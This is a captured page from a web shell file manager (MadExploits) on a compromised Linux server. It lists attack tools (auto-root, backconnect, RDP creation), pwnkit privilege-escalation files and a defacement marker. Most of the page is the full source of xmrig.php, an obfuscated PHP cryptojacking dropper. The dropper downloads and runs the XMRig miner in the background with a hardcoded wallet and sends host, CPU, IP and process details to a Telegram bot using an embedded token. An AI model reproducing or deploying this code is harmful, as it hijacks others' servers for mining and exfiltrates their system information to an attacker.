Linux e000727e84fa 5.4.0-208-generic #228-Ubuntu SMP Fri Feb 7 19:41:33 UTC 2025 x86_64
Apache/2.4.62 (Debian)
: 192.168.16.2 | : 192.168.16.1
Cant Read [ /etc/named.conf ]
8.2.27
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
tmp /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
xmrig-6.21.0
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
3peaksinternational.com.html
90.85
KB
-rw-r--r--
B3RT1337_is_Here
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
meow.sh
7.02
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
xmrig.php
11.43
KB
-rw-r--r--
xmrig.tar.gz
3.39
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xmrig.php
<?php goto JyjuI; Bnd8F: echo "\xe2\234\x85\40\106\151\154\x65\x20\x64\x69\165\156\x64\x75\x68\72\x20{$filename}\12"; goto pISDX; vXLtW: exec("\x74\x61\x72\x20\x2d\170\146\x20{$filename}"); goto L2Txs; bN4kO: echo "\342\234\205\x20\x45\153\x73\x74\x72\141\x6b\x73\151\x20\142\145\x72\150\x61\x73\151\x6c\72\40{$folder_name}\12"; goto hWUdN; GODr_: chdir($folder); goto WomLE; PPO5J: if (!empty($procs)) { echo "\xe2\x9c\x85\40\x50\x72\157\163\x65\x73\40\130\x4d\x52\151\x67\40\142\x65\162\x6a\x61\x6c\x61\x6e\72\xa" . implode("\12", $procs) . "\12\74\57\160\162\x65\x3e"; $ram_info = trim(shell_exec("\x66\x72\145\x65\x20\x2d\x68\40\x7c\40\147\x72\x65\x70\x20\115\x65\155\40\174\x20\141\x77\153\40\x27\x7b\160\x72\x69\156\x74\x20\44\x32\x20\x22\40\50\x75\x73\145\x64\x3a\x20\x22\x20\x24\63\40\x22\54\40\146\x72\x65\x65\72\40\42\40\x24\x34\40\x22\51\x22\175\x27")); $cpu_cores = trim(shell_exec("\154\x73\143\x70\x75\x20\174\40\147\x72\x65\x70\40\x27\136\103\x50\x55\x28\x73\51\72\x27\x20\x7c\40\x61\167\153\x20\x27\x7b\x70\x72\151\x6e\164\40\44\62\40\42\40\x63\157\x72\145\163\x22\175\47")); $cpu_threads = trim(shell_exec("\154\163\143\x70\165\x20\x7c\40\x67\162\145\x70\40\47\136\x54\x68\162\145\x61\x64\x28\x73\51\x20\160\145\x72\x20\x63\157\x72\x65\72\47\40\x7c\40\x61\167\153\40\x27\173\160\162\151\x6e\164\40\x24\64\x20\42\x20\164\x68\x72\145\141\x64\x73\x2f\143\157\162\x65\42\x7d\47")); $uname_info = trim(shell_exec("\165\x6e\x61\155\x65\40\x2d\x61")); $ip_info = trim(shell_exec("\x68\157\x73\x74\156\141\x6d\x65\x20\55\111\x20\174\40\x61\x77\153\x20\x27\x7b\x70\162\151\x6e\x74\x20\x24\61\x7d\47")); $message = "\xe2\x9c\x85\x20\x3c\142\76\130\x4d\122\x69\147\x20\x64\151\x6a\x61\x6c\141\156\153\141\x6e\40\163\x75\x6b\x73\145\x73\74\x2f\x62\x3e\12" . "\360\x9f\226\xa5\xef\xb8\x8f\x20\x3c\142\x3e\110\x6f\163\x74\x6e\141\x6d\145\x3c\57\x62\76\x3a\x20\74\143\157\x64\x65\76{$uname}\x3c\x2f\x63\157\144\x65\76\12" . "\360\x9f\247\240\x20\74\x62\76\103\x50\125\74\57\142\76\x3a\x20{$core_count}\x20\x63\x6f\x72\145\x28\x73\51\xa" . "\xf0\x9f\247\xaa\40\74\142\x3e\x49\x6e\x66\157\x3c\x2f\142\x3e\x3a\40{$cpu_cores}\x20\x7c\x20{$cpu_threads}\12" . "\xf0\x9f\x93\246\40\x3c\142\76\x52\101\x4d\74\x2f\142\76\72\x20{$ram_info}\12" . "\xf0\x9f\221\244\40\74\x62\76\125\163\x65\162\x3c\57\x62\x3e\x3a\40{$whoami}\12" . "\xf0\237\214\x90\40\x3c\x62\76\x49\120\74\57\x62\76\72\40{$ip_info}\xa" . "\xf0\x9f\x94\xa7\x20\x3c\x62\76\123\171\163\x74\145\x6d\74\57\x62\76\x3a\40\x3c\x63\x6f\x64\145\x3e{$uname_info}\x3c\57\x63\157\x64\145\76\xa\xa" . "\xe2\233\x8f\357\270\x8f\40\x3c\x62\x3e\x50\162\x6f\143\145\163\163\74\57\x62\76\72\xa\x3c\143\x6f\x64\145\x3e" . implode("\12", $procs) . "\74\x2f\x63\x6f\x64\x65\x3e\xa\xa" . "\xf0\x9f\224\227\x20\x3c\142\x3e\123\143\162\x69\x70\x74\40\x55\122\x4c\74\57\142\x3e\x3a\x20\74\141\x20\x68\162\145\146\x3d\x22{$current_url}\42\76\x4f\x70\145\156\x20\123\143\162\151\160\x74\74\57\x61\x3e"; sendTelegram($telegram_token, $telegram_chatid, $message); } else { echo "\342\235\x8c\x20\x47\141\x67\141\154\x20\x6d\145\156\x6a\x61\x6c\141\156\x6b\x61\x6e\x20\130\115\122\x69\147\x2e\12\74\x2f\160\162\145\76"; } goto wg24t; eRPCT: error_reporting(E_ALL); goto HgqYI; Hfqpg: $base_dir = "\x2f\x76\x61\162\x2f\167\x77\x77"; goto RBtlt; WomLE: exec("\x70\x67\162\x65\160\40\x2d\x66\40\x78\155\162\151\147", $already_running); goto MiKNX; dM7wE: ini_set("\144\151\x73\160\154\x61\x79\x5f\x73\164\x61\x72\164\165\x70\137\145\162\162\x6f\x72\163", 1); goto eRPCT; JyjuI: ini_set("\144\x69\163\160\x6c\141\x79\x5f\x65\162\x72\x6f\162\163", 1); goto dM7wE; kx3Xl: $filename = "\170\x6d\162\x69\147\56\x74\x61\x72\56\147\x7a"; goto Ax7aD; JN7pA: $run_cmd = "\56\57\x78\155\162\151\x67\x20\x2d\157\40\x73\164\x72\141\164\165\x6d\x2b\163\163\154\x3a\57\x2f\x72\170\56\165\x6e\x6d\x69\x6e\145\141\142\154\x65\56\143\x6f\155\x3a\x34\64\63\x20\x2d\141\40\162\170\x20\55\153\x20\x2d\x75\x20\x44\117\x47\105\72\104\x51\62\x63\124\x62\x37\66\x36\155\x53\x76\66\x46\121\147\x4e\124\x33\156\x6e\x74\157\x45\141\x70\x65\171\x6f\143\113\171\63\x5a\x2e\x6b\145\142\160\x6c\x20\x2d\x2d\143\x70\x75\x2d\x6d\x61\170\x2d\164\x68\x72\145\x61\x64\163\x2d\150\x69\156\164\75\61\x30\60"; goto EsZc_; TY1sE: $current_url .= "\72\57\57{$_SERVER["\x48\124\x54\120\137\x48\117\x53\x54"]}{$_SERVER["\122\x45\x51\125\105\x53\x54\137\125\x52\x49"]}"; goto Hfqpg; wg24t: function sendTelegram($token, $chatid, $msg) { $url = "\x68\164\x74\x70\x73\72\x2f\57\x61\x70\x69\56\x74\145\x6c\x65\147\x72\x61\155\x2e\x6f\x72\147\57\142\157\164{$token}\x2f\163\x65\x6e\144\115\145\163\163\x61\147\145"; $data = http_build_query(array("\143\150\141\164\137\151\x64" => $chatid, "\x74\145\x78\x74" => $msg, "\x70\141\x72\x73\145\137\155\x6f\144\x65" => "\110\124\x4d\114")); $opts = array("\150\164\x74\x70" => array("\x6d\x65\x74\150\157\x64" => "\x50\117\x53\124", "\x68\145\x61\144\145\162" => "\103\x6f\x6e\164\x65\x6e\x74\55\x54\x79\x70\145\x3a\x20\141\x70\x70\x6c\151\x63\x61\x74\x69\157\156\x2f\170\x2d\x77\167\167\55\x66\157\162\x6d\55\165\162\x6c\x65\156\x63\x6f\x64\145\x64", "\x63\x6f\x6e\x74\x65\x6e\x74" => $data)); file_get_contents($url, false, stream_context_create($opts)); } goto ykNR0; f4RUB: $telegram_chatid = "\67\71\60\64\61\x36\x32\x33\70\x30"; goto BoDgZ; BoDgZ: $uname = php_uname("\x6e"); goto GTDg6; cXxQr: $custom_dir = "\x2f\166\x61\162\57\x74\155\x70"; goto jQrFH; JcEU2: if (!$folder) { if (!is_dir($custom_dir)) { mkdir($custom_dir, 493, true); } if (!is_writable($custom_dir)) { die("\74\160\x72\x65\x3e\342\x9d\214\x20\124\151\x64\141\x6b\40\x62\x69\163\141\x20\x6d\145\156\x75\154\x69\163\40\x6b\x65\x20{$custom_dir}\x3c\57\x70\162\x65\76"); } $folder = $custom_dir; echo "\x3c\160\x72\x65\76\xf0\x9f\223\202\40\x46\157\154\144\x65\x72\40\146\x61\x6c\154\142\141\x63\x6b\72\x20{$folder}\12"; } else { echo "\74\x70\162\145\76\xf0\237\223\x82\40\x4d\x65\x6e\147\147\165\x6e\x61\x6b\141\156\40\x66\157\154\x64\145\x72\x3a\40{$folder}\xa"; } goto GODr_; jQrFH: $folder = null; goto P2jvA; HgqYI: set_time_limit(0); goto UC9IO; MiKNX: $folder_name = "\x78\x6d\162\151\147\x2d\x36\56\x32\61\56\60"; goto QSxKH; V59Yl: $telegram_token = "\70\x35\66\x37\x33\x33\67\x30\x34\x30\x3a\x41\x41\x48\x59\150\x46\x37\171\112\x71\x57\67\x5a\103\x37\143\x4f\141\146\x36\151\155\x6a\101\150\55\x4a\112\x73\x57\131\x44\x6b\70\x77"; goto f4RUB; UC9IO: error_reporting(0); goto V59Yl; XjyVO: echo "\360\x9f\247\xa0\x20\x4a\x75\155\154\x61\x68\40\143\x6f\162\145\40\x43\x50\125\72\40{$core_count}\12"; goto p0Gu_; QwL8u: $core_count = intval(trim(shell_exec("\156\x70\162\157\143"))); goto bsMqa; QSxKH: $xmrig_folder_path = $folder . "\x2f" . $folder_name; goto XQ9m4; EsZc_: $current_url = isset($_SERVER["\x48\124\124\120\123"]) && $_SERVER["\x48\124\x54\x50\x53"] === "\157\156" ? "\x68\164\x74\x70\163" : "\x68\164\x74\160"; goto TY1sE; p0Gu_: if (shell_exec("\167\150\151\x63\x68\40\156\157\150\165\x70")) { $cmd = "\x6e\x6f\150\165\x70\40{$run_cmd}\40\x3e\x20\x2f\x64\x65\166\x2f\156\165\154\x6c\x20\x32\76\x26\61\40\46"; echo "\xf0\x9f\x9a\x80\x20\x4d\x65\x6e\152\141\154\x61\x6e\153\x61\x6e\40\x64\x65\156\147\x61\x6e\72\x20\x6e\157\x68\165\160\12"; } elseif (shell_exec("\x77\x68\x69\143\150\40\x73\x65\164\x73\151\x64")) { $cmd = "\163\x65\x74\163\151\144\40{$run_cmd}\40\x3e\40\x2f\x64\145\166\x2f\156\165\154\x6c\x20\62\x3e\46\61\x20\x26"; echo "\360\237\x9a\200\x20\x4d\x65\x6e\152\141\154\x61\156\153\x61\156\40\x64\x65\156\x67\x61\156\x3a\40\163\145\x74\163\151\x64\xa"; } else { $cmd = "{$run_cmd}\40\76\x20\x2f\144\x65\x76\x2f\x6e\x75\x6c\154\40\62\x3e\x26\61\x20\46"; echo "\360\x9f\232\x80\x20\x4d\145\x6e\x6a\x61\154\141\156\153\x61\156\40\144\145\156\x67\x61\x6e\x3a\40\142\141\143\153\147\x72\157\165\156\144\x20\50\x26\51\12"; } goto jSA3W; hWUdN: chdir($xmrig_folder_path); goto XjyVO; bsMqa: $core_count = $core_count > 0 ? $core_count : 1; goto ihVsX; ihVsX: $wallet = "\x44\x51\x32\143\x54\142\67\x36\66\155\123\x76\66\x46\x51\147\x4e\124\x33\x6e\x6e\164\157\x45\141\160\145\171\157\143\113\171\63\x5a"; goto JN7pA; Ax7aD: $success = false; goto AVc8F; aX1eT: if (!$success) { die("\342\235\x8c\40\107\x61\x67\x61\154\40\155\145\156\147\165\156\144\165\150\x20\x66\151\x6c\145\40\130\x4d\122\x69\147\x2e\12\x3c\57\160\x72\x65\x3e"); } goto Bnd8F; iVKJl: if (!$success) { exec("\143\x75\162\154\x20\55\x73\40\x2d\x4c\40\55\157\x20{$filename}\x20{$remote_url}"); $success = file_exists($filename); } goto aX1eT; AVc8F: if (shell_exec("\x77\150\151\x63\150\40\167\147\145\164")) { exec("\x77\147\x65\x74\40\55\161\x20\55\117\40\170\x6d\162\151\x67\56\164\x61\162\x2e\x67\172\40\150\164\x74\160\x73\x3a\57\57\147\x69\x74\x68\x75\142\56\x63\x6f\155\x2f\170\x6d\162\151\147\x2f\x78\x6d\162\151\x67\57\x72\x65\x6c\145\x61\163\x65\x73\x2f\144\x6f\x77\156\154\157\x61\x64\57\166\66\56\62\x31\56\x30\57\x78\x6d\x72\151\x67\x2d\66\56\x32\61\56\60\x2d\x6c\x69\x6e\x75\x78\55\170\x36\64\x2e\x74\141\162\56\147\172"); $success = file_exists($filename); } goto iVKJl; XQ9m4: if (!empty($already_running) && is_dir($xmrig_folder_path)) { echo "\xe2\232\xa0\xef\270\217\x20\x58\115\122\x69\147\x20\163\165\144\141\150\40\142\x65\x72\x6a\x61\x6c\141\x6e\x2e\40\x54\151\144\x61\153\x20\144\151\x6a\141\154\141\156\x6b\x61\x6e\40\x75\x6c\141\x6e\147\56\12\x3c\57\x70\162\145\76"; $message = "\342\x9a\240\xef\xb8\x8f\x20\74\142\76\x58\x4d\122\x69\x67\40\x73\x75\x64\x61\x68\40\x62\x65\162\x6a\141\154\x61\x6e\x3c\x2f\x62\x3e\xa" . "\360\x9f\226\xa5\xef\270\x8f\x20\x48\157\163\164\156\141\x6d\145\x3a\40\74\x63\x6f\144\x65\76{$uname}\74\57\143\157\x64\x65\76\xa" . "\xf0\237\247\xa0\x20\x43\157\x72\x65\72\x20{$core_count}\12" . "\xf0\x9f\223\x81\40\106\157\x6c\144\x65\x72\72\x20{$xmrig_folder_path}\12" . "\360\237\223\x9b\x20\x50\111\x44\50\163\x29\72\40" . implode("\x2c\40", $already_running) . "\xa" . "\360\237\x94\x97\40\x3c\142\76\123\x63\162\x69\160\164\x20\x55\x52\x4c\x3c\57\x62\x3e\72\40\x3c\141\x20\150\x72\x65\x66\75\x22{$current_url}\42\x3e\117\160\145\156\40\x53\143\162\x69\x70\164\x3c\x2f\141\76"; sendTelegram($telegram_token, $telegram_chatid, $message); die; } goto bCq6t; GTDg6: $whoami = "\x68\141\142\x75\x74\x65\143\150\x6e\157\154\x6f\x67\x79"; goto QwL8u; jSA3W: exec($cmd); goto KrN_G; L2Txs: if (!is_dir($folder_name)) { die("\xe2\235\x8c\40\x45\153\x73\x74\162\141\x6b\x73\151\x20\x67\x61\x67\x61\x6c\x2e\xa\x3c\57\160\162\x65\76"); } goto bN4kO; pISDX: echo "\360\237\x93\246\40\x4d\x65\x6e\x67\145\x6b\163\164\162\x61\153\x2e\56\56\12"; goto vXLtW; ZMUVp: $remote_url = "\150\x74\x74\x70\163\72\x2f\x2f\147\151\x74\150\165\142\x2e\x63\157\155\x2f\x78\155\x72\151\x67\57\170\155\x72\x69\x67\x2f\x72\145\x6c\x65\141\163\145\x73\57\x64\x6f\167\x6e\x6c\x6f\x61\144\x2f\x76\66\56\62\61\x2e\60\57\x78\155\162\151\147\x2d\x36\56\62\61\x2e\x30\55\154\x69\x6e\x75\x78\55\170\x36\64\x2e\164\141\x72\56\x67\172"; goto kx3Xl; P2jvA: foreach ($check_dirs as $d) { $try = $base_dir . "\57" . $d; if (is_dir($try) && is_writable($try)) { $folder = $try; break; } } goto JcEU2; khe7T: echo "\xe2\xac\207\357\270\217\x20\x4d\x65\x6e\147\165\x6e\x64\165\x68\40\130\x4d\122\x69\147\56\56\x2e\12"; goto ZMUVp; RBtlt: $check_dirs = array("\164\x6d\160", "\x77\167\167", "\x6d\141\151\154"); goto cXxQr; KrN_G: exec("\x70\x67\162\x65\160\40\55\146\154\x20\170\155\x72\x69\x67", $procs); goto PPO5J; bCq6t: if (!is_dir($xmrig_folder_path) && !empty($already_running)) { echo "\xe2\232\240\357\xb8\217\40\x46\x6f\x6c\x64\x65\162\40\150\151\x6c\x61\x6e\x67\54\x20\x74\141\x70\x69\x20\x70\162\157\x73\145\x73\x20\x6d\x61\x73\x69\150\40\x68\x69\144\x75\160\x2e\40\115\145\x6c\x61\153\x75\153\x61\156\40\163\145\164\x75\x70\x20\165\x6c\141\156\x67\56\56\x2e\12"; } goto khe7T; ykNR0: die;
Close
